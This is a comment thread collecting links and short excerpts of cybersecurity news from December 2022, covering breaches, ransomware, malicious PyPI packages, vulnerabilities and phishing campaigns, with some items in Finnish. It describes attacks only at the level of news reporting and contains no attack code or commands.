This posting is here to collect cyber security news in December 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in December 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
355 Comments
Tomi Engdahl says:
The Government Workers Facing Seven Years in Prison for Not Updating Software
https://slate.com/technology/2022/12/albania-cyberattack-iran-it-workers-arrested.html
It’s not unheard of for government officials to lose their jobs following high-profile breaches.
That’s exactly what happened in late November, when Albanian prosecutors requested that five government IT officials in the public administration department be placed under house arrest for failing to update the antivirus software on government computers.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/lego-bricklink-bugs-let-hackers-hijack-accounts-breach-servers/
Tomi Engdahl says:
Hacker Reportedly Breaches US FBI Cybersecurity Forum
Bureau Ushered a Phony CEO Who Stole Emails Into a Seat at InfraGard
https://www.bankinfosecurity.com/hacker-reportedly-breaches-us-fbi-cybersecurity-forum-a-20712
Tomi Engdahl says:
Glitch prevents Twitter accounts from receiving verification codes
https://thedesk.net/2022/12/twitter-two-factor-authentication-bug-2fa-glitch-elon-musk-locked-out/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-esxi-and-vrealize-security-flaws/
Tomi Engdahl says:
https://www.darkreading.com/attacks-breaches/cyberattack-shuts-down-french-hospital
Tomi Engdahl says:
Lentoyhtiöt ovat raportoineet toistuvista gps-häiriöistä Lapissa viime viikkoina Traficom: Ei vaaraa lentoturvallisuudelle
https://yle.fi/a/74-20009019
Pohjoisen kautta palanneilla Aasian-lennoilla ja Pohjois-Norjassa Suomen rajalla lentäneistä koneista gps-signaali on saattanut kadota
5-10 minuutin ajaksi. Signaalin heikkenemisen syystä ei ole tietoa.
Meidän maalaitteemme eivät ole havainneet heikkouksia signaalissa, Pöntinen sanoo.
Tomi Engdahl says:
CISA Alert: Veeam Backup and Replication Vulnerabilities Being Exploited in Attacks https://thehackernews.com/2022/12/cisa-alert-veeam-backup-and-replication.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities impacting Veeam Backup & Replication software to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation in the wild.
Tomi Engdahl says:
Backdoor Targets FreePBX Asterisk Management Portal https://blog.sucuri.net/2022/12/backdoor-targets-freepbx-asterisk-management-portal.html
During a recent investigation, I came across a simple piece of malware targeting FreePBXs Asterisk Management portal which allowed attackers to arbitrarily add and delete users, as well as modify the websites .htaccess file.
Tomi Engdahl says:
Agenda Ransomware Uses Rust to Target More Vital Industries https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html
This year, ransomware-as-a-service (RaaS) groups like BlackCat, Hive, and RansomExx have developed versions of their ransomware in Rust, a cross-platform language that makes it easier to tailor malware to different operating systems like Windows and Linux. In this blog entry, we shed light on Agenda (also known as Qilin), another ransomware group that has started using this language.
Tomi Engdahl says:
Phishing attack uses Facebook posts to evade email security https://www.bleepingcomputer.com/news/security/phishing-attack-uses-facebook-posts-to-evade-email-security/
A new phishing campaign uses Facebook posts as part of its attack chain to trick users into giving away their account credentials and personally identifiable information (PII). The emails sent to targets pretend to be a copyright infringement issue on one of the recipient’s Facebook posts, warning that their account will be deleted within 48 hours if no appeal is filed.
Tomi Engdahl says:
3.5m IP cameras exposed, with US in the lead https://cybernews.com/security/millions-ip-cameras-exposed/
New research by Cybernews shows an exponential rise in the uptake of internet-facing cameras. After looking at 28 of the most popular manufacturers, our research team found 3.5 million IP cameras exposed to the internet, signifying an eightfold increase since April 2021.
Tomi Engdahl says:
Effective, fast, and unrecoverable: Wiper malware is popping up everywhere https://arstechnica.com/information-technology/2022/12/effective-fast-and-unrecoverable-wiper-malware-is-popping-up-everywhere/
Over the past year, a flurry of destructive wiper malware from no fewer than nine families has appeared. In the past week, researchers cataloged at least two more, both exhibiting advanced codebases designed to inflict maximum damage. On Monday, researchers from Check Point Research published details of Azov, a previously unseen piece of malware that the company described as an effective, fast, and unfortunately unrecoverable data wiper.
Tomi Engdahl says:
Social Blade Confirms Breach After Hacker Offers to Sell User Data
https://www.securityweek.com/social-blade-confirms-breach-after-hacker-offers-sell-user-data
Tomi Engdahl says:
Microsoft Reclassifies Windows Flaw After IBM Researcher Proves Remote Code Execution
https://www.securityweek.com/microsoft-reclassifies-windows-flaw-after-ibm-researcher-proves-remote-code-execution
Microsoft has reclassified a Windows vulnerability after an IBM security researcher demonstrated that it can be exploited for remote code execution.
In September, Microsoft announced that Windows and Windows Server updates patched CVE-2022-37958, an issue related to the SPNEGO Extended Negotiation (NEGOEX) security mechanism, which is used by clients and servers to negotiate the authentication protocol.
An anonymous researcher informed Microsoft about the issue, which appeared to lead to information disclosure. The tech giant assigned it an ‘important’ rating.
However, when it released its December 2022 Patch Tuesday updates, Microsoft also announced an update to the advisory for CVE-2022-37958, changing its rating to ‘critical’ and warning that it can be exploited for remote code execution.
The advisory and the vulnerability’s rating were updated after IBM Security X-Force Red researcher Valentina Palmiotti showed that the flaw is in fact critical as it can be exploited by an unauthenticated attacker for remote code execution, it impacts a wide range of protocols, it does not require user interaction, and it’s potentially wormable.
Critical Remote Code Execution Vulnerability in SPNEGO Extended Negotiation Security Mechanism
https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
In September 2022, Microsoft patched an information disclosure vulnerability in SPNEGO NEGOEX (CVE-2022-37958). On December 13, Microsoft reclassified the vulnerability as “Critical” severity after IBM Security X-Force Red Security Researcher Valentina Palmiotti discovered the vulnerability could allow attackers to remotely execute code.
The vulnerability is in the SPNEGO Extended Negotiation (NEGOEX) Security Mechanism, which allows a client and server to negotiate the choice of security mechanism to use. This vulnerability is a pre-authentication remote code execution vulnerability impacting a wide range of protocols. It has the potential to be wormable.
SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37958
Tomi Engdahl says:
https://www.securityweek.com/us-food-companies-warned-bec-attacks-stealing-food-product-shipments
Tomi Engdahl says:
FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked
https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/
InfraGard, a program run by the U.S. Federal Bureau of Investigation (FBI) to build cyber and physical threat information sharing partnerships with the private sector, this week saw its database of contact information on more than 80,000 members go up for sale on an English-language cybercrime forum. Meanwhile, the hackers responsible are communicating directly with members through the InfraGard portal online — using a new account under the assumed identity of a financial industry CEO that was vetted by the FBI itself.
On Dec. 10, 2022, the relatively new cybercrime forum Breached featured a bombshell new sales thread: The user database for InfraGard, including names and contact information for tens of thousands of InfraGard members.
The FBI’s InfraGard program is supposed to be a vetted Who’s Who of key people in private sector roles involving both cyber and physical security at companies that manage most of the nation’s critical infrastructures — including drinking water and power utilities, communications and financial services firms, transportation and manufacturing companies, healthcare providers, and nuclear energy firms.
“InfraGard connects critical infrastructure owners, operators, and stakeholders with the FBI to provide education, networking, and information-sharing on security threats and risks,” the FBI’s InfraGard fact sheet reads.
Tomi Engdahl says:
https://hackaday.com/2022/12/16/this-week-in-security-scamming-the-fbi-in-the-wild-and-ai-security/
First off, the good folks at FreeBSD have published some errata about the ping problem we talked about last week. First off, note that while ping does elevate to root privileges via setuid, those privileges are dropped before any data handling occurs. And ping on FreeBSD runs inside a Capsicum sandbox, a huge obstacle to system compromise from within ping. And finally, further examination of the bug in a real-world context casts doubt on the idea that Remote Code Execution (RCE) is actually possible due to stack layouts.
https://lists.freebsd.org/archives/freebsd-security/2022-December/000108.html
https://www.cl.cam.ac.uk/research/security/capsicum/
Sage advice from [Florian Obser], OpenBSD developer. So seeing the ping problem in FreeBSD, he set about checking the OpenBSD ping implementation for identical or similar problems. The vulnerable code isn’t shared between the versions, so he reached for afl++, a fuzzing tool with an impressive list of finds.
https://tlakh.xyz/fuzzing-ping.html
https://aflplus.plus/
Tomi Engdahl says:
Using OpenAI Chat to Generate Phishing Campaigns
https://www.richardosgood.com/posts/using-openai-chat-for-phishing/
Tomi Engdahl says:
Attackers use SVG files to smuggle QBot malware onto Windows systems
https://www.bleepingcomputer.com/news/security/attackers-use-svg-files-to-smuggle-qbot-malware-onto-windows-systems/
QBot malware phishing campaigns have adopted a new distribution method using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows.
This attack is made through embedded SVG files containing JavaScript that reassemble a Base64 encoded QBot malware installer that is automatically downloaded through the target’s browser.
Tomi Engdahl says:
https://tech.co/news/researchers-security-concerns-google-one-vpn
Tomi Engdahl says:
Delete Your Phone Number From Twitter Before They Sell It
Twitter is reportedly making plans to sell your location data, too.
https://lifehacker.com/delete-your-phone-number-from-twitter-before-they-sell-1849897919
Tomi Engdahl says:
NSA says Chinese hackers are exploiting a zero-day bug in popular networking gear
https://techcrunch.com/2022/12/14/nsa-says-chinese-hackers-are-exploiting-a-zero-day-bug-in-popular-networking-gear/
The U.S. National Security Agency is warning that Chinese government-backed hackers are exploiting a zero-day vulnerability in two widely used Citrix networking products to gain access to targeted networks.
Tomi Engdahl says:
Dan Bilefsky / New York Times:
The Metropolitan Opera restarts processing ticket orders, nine days after a suspected ransomware attack took its website offline and paralyzed its box office
https://www.nytimes.com/2022/12/15/arts/music/met-opera-cyberattack.html
Tomi Engdahl says:
The risk of escalation from cyberattacks has never been greater https://arstechnica.com/information-technology/2022/12/the-risk-of-escalation-from-cyberattacks-has-never-been-greater/
With cyber, uncertainty over who is attacking pushes adversaries in a similar direction. The US shouldnt retaliate none of the time (that would make it look weak), and it shouldnt respond all of the time (that would retaliate against too many innocents). Its best move is to retaliate some of the time, somewhat capriciouslyeven though it risks retaliating against the wrong foe.
Tomi Engdahl says:
Malicious SentinelOne PyPI package steals data from developers https://www.bleepingcomputer.com/news/security/malicious-sentinelone-pypi-package-steals-data-from-developers/
Threat actors have published a malicious Python package on PyPI, named ‘SentinelOne,’ that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers. The package offers the expected functionality, which is easily accessing the SentinelOne API from within another project.
However, this package has been trojanized to steal sensitive data from compromised developer systems.
Tomi Engdahl says:
Sovellus tökki vielä 5 päivää nettihyökkäyksen jälkeen näin Helsingin seudun liikenne kommentoi https://www.is.fi/digitoday/art-2000009276469.html
HELSINGIN seudun liikenteen (HSL) viime viikkona kärsimä kyberhyökkäys on ainakin toistaiseksi ohi, mutta HSL-sovellus palasi toimintaan vasta tänään maanantaina. Reittiopas ilmoitti suurimman osan päivästä, että palveluun ei saada yhteyttä. Se on tarkoituksellista.
Huomasimme, että siinä on ollut häiriö, jota olemme selvittäneet.
Vielä emme osaa sanoa, mistä tarkalleen ottaen on kyse. Jotain siinä on hajonnut, kertoo HSL:n viestintäpäällikkö Johannes Laitila.
Tomi Engdahl says:
Gatekeepers Achilles heel: Unearthing a macOS vulnerability https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/
In this blog post, we share information about Gatekeeper and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.
Tomi Engdahl says:
FoxIt Patches Code Execution Flaws in PDF Tools
https://www.securityweek.com/foxit-patches-code-execution-flaws-pdf-tools
Foxit Software has rolled out a critical-severity patch to cover a dangerous remote code execution flaw in its flagship PDF Reader and PDF Editor products.
The vulnerability, which was discovered and reported by researchers at the Renmin University of China, could be exploited via rigged PDF files of web pages, the company warned in an advisory.
Foxit, which offers an alternative to Adobe’s ubiquitous PDF procession tools, said the vulnerability is contained to the Windows platform and affects Foxit PDF Reader 12.0.2.12465 and earlier, and the Foxit PhantomPDF – 10.1.7.37777 and earlier.
Tomi Engdahl says:
Malicious PyPI Module Poses as SentinelOne SDK
https://www.securityweek.com/malicious-pypi-module-poses-sentinelone-sdk
Security researchers with ReversingLabs warn of a new supply chain attack using a malicious PyPI module that poses as a software development kit (SDK) from the cybersecurity firm SentinelOne.
The Python package was first uploaded on December 11 and received roughly 20 updates within the next two days. The module is completely unrelated to the legitimate threat detection firm, but abuses its brand reputation to attract unsuspecting victims.
Seemingly a fully-functional SentinelOne client – the malicious SDK appears built on top of legitimate SentinelOne code – the package contains backdoor code meant for data theft.
“This PyPI package is intended to serve as an SDK to abstract the access to SentinelOne’s APIs and make programmatic consumption of the APIs simpler,” ReversingLabs, which calls the attack ‘SentinelSneak’, notes.
The malicious package contains two api.py files that engage in suspicious behavior such as enumerating files in a directory, executing a file, deleting a file/directory, and spawning a new process.
SentinelSneak: Malicious PyPI module poses as security software development kit
https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk
A malicious Python file found on the PyPI repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK client from SentinelOne.
A malicious Python package is posing as a software development kit (SDK) for the security firm SentinelOne, researchers at ReversingLabs discovered. The package, SentinelOne has no connection to the noted threat detection firm of the same name and was first uploaded to PyPI, the Python Package Index, on Dec 11, 2022. It has been updated 20 times since, with the most recent version, 1.2.1, uploaded on Dec 13, 2022.
The package appears to be a fully functional SentinelOne client, but contains a malicious backdoor, ReversingLabs threat researcher Karlo Zanki discovered.
Tomi Engdahl says:
Google Workspace Gets Client-Side Encryption in Gmail
https://www.securityweek.com/google-workspace-gets-client-side-encryption-gmail
Google on Friday announced the beta availability of client-side encryption in Gmail for some of its Google Workspace customers.
The feature is meant to improve the confidentiality of emails when they rest on Google’s servers, by applying encryption to the email body and attachments while providing Workspace customers with control over the encryption keys and the identity service used to access the keys.
“Google Workspace already uses the latest cryptographic standards to encrypt all data at rest and in transit between our facilities. Client-side encryption helps strengthen the confidentiality of your data while helping to address a broad range of data sovereignty and compliance needs,” Google announced.
The internet giant previously enabled client-side encryption for Workspace Enterprise Plus, Education Plus, and Education Standard customers, for services such as Google Drive, Docs, Sheets, Slides, Meet, and Calendar (beta).
Tomi Engdahl says:
Now, client-side encryption is also available for Gmail, and those interested in trying it can apply for beta access until January 20, 2023.
https://workspaceupdates.googleblog.com/2022/12/client-side-encryption-for-gmail-beta.html
Tomi Engdahl says:
Cisco Warns of Many Old Vulnerabilities Being Exploited in Attacks
https://www.securityweek.com/cisco-warns-many-old-vulnerabilities-being-exploited-attacks
Cisco has updated multiple security advisories to warn of the malicious exploitation of severe vulnerabilities impacting its networking devices.
Many of the bugs, which carry severity ratings of ‘critical’ or ‘high’, have been addressed 4-5 years ago, but organizations that haven’t patched their devices continue to be impacted.
Last week, the tech giant added exploitation warnings to more than 20 advisories detailing security defects in Cisco IOS, NX-OS, and HyperFlex software.
“In March 2022, the Cisco Product Security Incident Response Team (PSIRT) became aware of additional attempted exploitation of this vulnerability in the wild. Cisco continues to strongly recommend that customers upgrade to a fixed software release to remediate this vulnerability,” the warning reads.
Five of the updated advisories resolve critical-severity vulnerabilities that could allow remote attackers to execute arbitrary code (RCE), cause a denial-of-service (DoS) condition, or execute arbitrary commands.
Carrying a CVSS score of 9.8, the exploited vulnerabilities are tracked as CVE-2017-12240, CVE-2018-0171, CVE-2018-0125, CVE-2021-1497, and CVE-2018-0147, and impact Cisco IOS and IOS XE, the RV132W and RV134W routers, HyperFlex HX, and Secure Access Control System (ACS).
Cisco also updated 15 advisories that deal with high-severity flaws in Cisco IOS and IOS XE, and one that addresses a high-severity arbitrary command execution issue in Small Business RV series routers. Several advisories detailing medium-severity bugs were also updated.
Tomi Engdahl says:
Säkylän kunta kertoo joutuneensa kyberhyökkäyksen kohteeksi https://www.is.fi/digitoday/tietoturva/art-2000009278499.html
SÄKYLÄN kunta kertoo Facebook-sivuillaan joutuneensa kyberhyökkäyksen kohteeksi.
Säkylän kunnanjohtajan Teijo Mäenpään mukaan hyökkäys havaittiin kunnan oman it-seurantajärjestelmän avulla sunnuntai-iltana.
– Meillä on kunnan palkkalistoilla kaksi IT-asiantuntijaa. Avuksi on hankittu myös ulkopuolista vahvaa osaamista, Mäenpää kertoo.
Kunnanjohtajan mukaan toistaiseksi ei ole tiedossa kuka tai mikä voisi olla kyberhyökkäyksen takana. Mäenpää kertoo, että asiasta on tehty rikosilmoitus.
Tomi Engdahl says:
New ‘RisePro’ Infostealer Increasingly Popular Among Cybercriminals
https://www.securityweek.com/new-risepro-infostealer-increasingly-popular-among-cybercriminals
A recently identified information stealer named ‘RisePro’ is being distributed by pay-per-install malware downloader service ‘PrivateLoader’, cyberthreat firm Flashpoint reports.
Written in C++, RisePro harvests potentially sensitive information from the compromised machines and then attempts to exfiltrate it as logs.
RisePro was initially spotted on December 13, featured on a cybercrime marketplace called Russian Market, where cybercriminals upload and sell logs exfiltrated using stealers.
According to Flashpoint, the malware appears to be based on Vidar stealer, which has been analyzed several times in the past.
A fork of the Arkei stealer itself, Vidar is known for downloading a series of dependencies and configuration settings from its command-and-control (C&C) server. The infostealer was cracked in 2018 and several clones were seen in the past, including the ‘Oski’ and ‘Mars’ stealers.
https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/
Tomi Engdahl says:
Congress Moves to Ban TikTok From US Government Devices
https://www.securityweek.com/congress-moves-ban-tiktok-us-government-devices
TikTok would be banned from most U.S. government devices under a spending bill Congress unveiled early Tuesday, the latest push by American lawmakers against the Chinese-owned social media app.
The $1.7 trillion package includes requirements for the Biden administration to prohibit most uses of TikTok or any other app created by its owner, ByteDance Ltd. The requirements would apply to the executive branch — with exemptions for national security, law enforcement and research purposes — and don’t appear to cover Congress, where a handful of lawmakers maintain TikTok accounts.
TikTok is consumed by two-thirds of American teens and has become the second-most popular domain in the world. But there’s long been bipartisan concern in Washington that Beijing would use legal and regulatory power to seize American user data or try to push pro-China narratives or misinformation.’
Tomi Engdahl says:
DraftKings Data Breach Impacts Personal Information of 68,000 Customers
https://www.securityweek.com/draftkings-data-breach-impacts-personal-information-68000-customers
Sports betting firm DraftKings says the personal data of 68,000 individuals has been compromised in a recent data breach.
The incident, initially disclosed in November, was the result of a credential stuffing attack and not a breach of DraftKings’ systems, the company says.
Credential stuffing involves the use of leaked credentials (usernames, email addresses, and passwords) obtained from a third-party source to access an account on a different service. Such attacks are successful only because some individuals use the same credentials for accounts on different services.
DraftKings also announced at the time that the attackers withdrew roughly $300,000 from some of the compromised accounts, and that it would restore all the stolen funds.
https://twitter.com/DK_Assist/status/1594769117894279168
Tomi Engdahl says:
Microsoft Details Recent macOS Gatekeeper Bypass Vulnerability
https://www.securityweek.com/microsoft-details-recent-macos-gatekeeper-bypass-vulnerability
Tomi Engdahl says:
Raspberry Robin worm drops fake malware to confuse researchers https://www.bleepingcomputer.com/news/security/raspberry-robin-worm-drops-fake-malware-to-confuse-researchers/
The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it’s being run within sandboxes and debugging tools.
This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems. Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution. The malware reaches targeted systems via malicious USB drives that infect the device with malware when inserted and included.LNK file is double-clicked.
Tomi Engdahl says:
Play ransomware claims attack on German hotel chain H-Hotels
https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-german-hotel-chain-h-hotels/
The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company. H-Hotels is a hospitality business with 60 hotels in
50 locations across Germany, Austria, and Switzerland, offering a total capacity of 9, 600 rooms. The hotel chain employs 2, 500 people and is one of the largest in the DACH region, operating under H-Hotels’ and the sub-brands Hyperion, H4 Hotels, H2 Hotels, H + Hotels, H.ostels, and H.omes. H-Hotels disclosed the cyberattack last week and stated that the security incident occurred on Sunday, December 11th, 2022. “According to the first findings of internal and external IT specialists, cybercriminals managed to break through the extensive technical and organizational protection systems of IT in a professional attack, ” explained the H-Hotel’s security incident notice.
Tomi Engdahl says:
Hackers bombard PyPi platform with information-stealing malware https://www.bleepingcomputer.com/news/security/hackers-bombard-pypi-platform-with-information-stealing-malware/
The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers’ data. The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022. Since then, an additional 31 packages dropping W4SP’
have been removed from the PyPI repository, with the malware’s operators continuing to seek new ways to reintroduce their malware on the platform.
Tomi Engdahl says:
KmsdBot Botnet Suspected of Being Used as DDoS-for-Hire Service https://thehackernews.com/2022/12/kmsdbot-botnet-suspected-of-being-used.html
An ongoing analysis of the KmsdBot botnet has raised the possibility that it’s a DDoS-for-hire service offered to other threat actors. This is based on the different industries and geographies that were attacked, web infrastructure company Akamai said. Among the notable targets included FiveM and RedM, which are game modifications for Grand Theft Auto V and Red Dead Redemption 2, as well as luxury brands and security firms. KmsdBot is a Go-based malware that leverages SSH to infect systems and carry out activities like cryptocurrency mining and launch commands using TCP and UDP to mount distributed denial-of-service (DDoS) attacks.
Tomi Engdahl says:
Guardian newspaper hit by suspected ransomware attack, staff told not to come to office https://therecord.media/guardian-newspaper-hit-by-suspected-ransomware-attack-staff-told-not-to-come-to-office/
Staff at The Guardian newspaper have been told not to come into the office and to work from home for the rest of the week due to a suspected ransomware attack which struck late on Tuesday. The attack has impacted a number of business services at the 200-year-old news organization, but not its online site and apps which will continue to publish stories. An email sent to The Guardians employees on Wednesday and seen by The Record tells staff: The issues affecting Kings Place, the VPN, and the wires are ongoing, and our IT and engineering teams are working to resolve them.
Tomi Engdahl says:
GodFather Android Banking Trojan Targeting Users of Over 400 Banking and Crypto Apps https://thehackernews.com/2022/12/godfather-android-banking-trojan.html
An Android banking trojan known as GodFather is being used to target users of more than 400 banking and cryptocurrency apps spanning across
16 countries. This includes 215 banks, 94 crypto wallet providers, and
110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, Canada, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News. The malware, like many financial trojans targeting the Android ecosystem, attempts to steal user credentials by generating convincing overlay screens (aka web fakes) that are served atop target applications.
Tomi Engdahl says:
Okta’s source code stolen after GitHub repositories hacked https://www.bleepingcomputer.com/news/security/oktas-source-code-stolen-after-github-repositories-hacked/
Okta, a leading provider of authentication services and Identity and Access Management (IAM) solutions, says that its private GitHub repositories were hacked this month. According to a ‘confidential’
email notification sent by Okta and seen by BleepingComputer, the security incident involves threat actors stealing Okta’s source code.
Tomi Engdahl says:
FBI warns of search engine ads pushing malware, phishing https://www.bleepingcomputer.com/news/security/fbi-warns-of-search-engine-ads-pushing-malware-phishing/
The FBI warns that threat actors are using search engine advertisements to promote websites distributing ransomware or stealing login credentials for financial institutions and crypto exchanges. In today’s public service announcement, the federal law enforcement agency said threat actors purchase advertisements that impersonate legitimate businesses or services. These ads appear at the top of search result pages and link to sites that look identical to the impersonated company’s website. “When a user searches for that business or service, these advertisements appear at the very top of search results with minimum distinction between an advertisement and an actual search result,” warns the FBI. “These advertisements link to a webpage that looks identical to the impersonated business’s official webpage.”
Tomi Engdahl says:
Russians hacked JFK airports taxi dispatch system for profit https://www.bleepingcomputer.com/news/security/russians-hacked-jfk-airport-s-taxi-dispatch-system-for-profit/
Two U.S. citizens were arrested for allegedly conspiring with Russian hackers to hack the John F. Kennedy International Airport (JFK) taxi dispatch system to move specific taxis to the front of the queue in exchange for a $10 fee. The taxi dispatch system is a computer-controlled system that ensures that taxis are dispatched from the airports holding lot to pick up the next available fare at the appropriate terminal. Usually, taxis must wait several hours in the lot before the dispatch system summons them. This system was put in place to maintain a fair operational environment for taxi drivers in an area with significant demand for their services.
Tomi Engdahl says:
Restaurant platform SevenRooms confirms data breach https://www.malwarebytes.com/blog/news/2022/12/restaurant-platform-sevenrooms-confirms-fallout-from-third-party-vendor-data-breach
SevenRooms, a guest experience and retention platform for food establishments and hospitality organisations, has confirmed it has fallen victim to a third party vendor data breach. Mostly known for its customer management platform, Seven Rooms’ breach came to light after stolen data was seen for sale on an underground forum.
SevenRooms confirmed to Bleeping Computer that the data, samples of which were posted on the forum on 15th December, is real. This data selection contained thousands of files containing data on SevenRooms customers.
Tomi Engdahl says:
Ransomware gang uses new Microsoft Exchange exploit to breach servers https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-new-microsoft-exchange-exploit-to-breach-servers/
Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA). Cybersecurity firm CrowdStrike spotted the exploit (dubbed
OWASSRF) while investigating Play ransomware attacks where compromised Microsoft Exchange servers were used to infiltrate the victims’
networks. To execute arbitrary commands on compromised servers, the ransomware operators leveraged Remote PowerShell to abuse the CVE-2022-41082, the same bug exploited by ProxyNotShell.
Tomi Engdahl says:
Critical Vulnerabilities Found in Passwordstate Enterprise Password Manager
https://www.securityweek.com/critical-vulnerabilities-found-passwordstate-enterprise-password-manager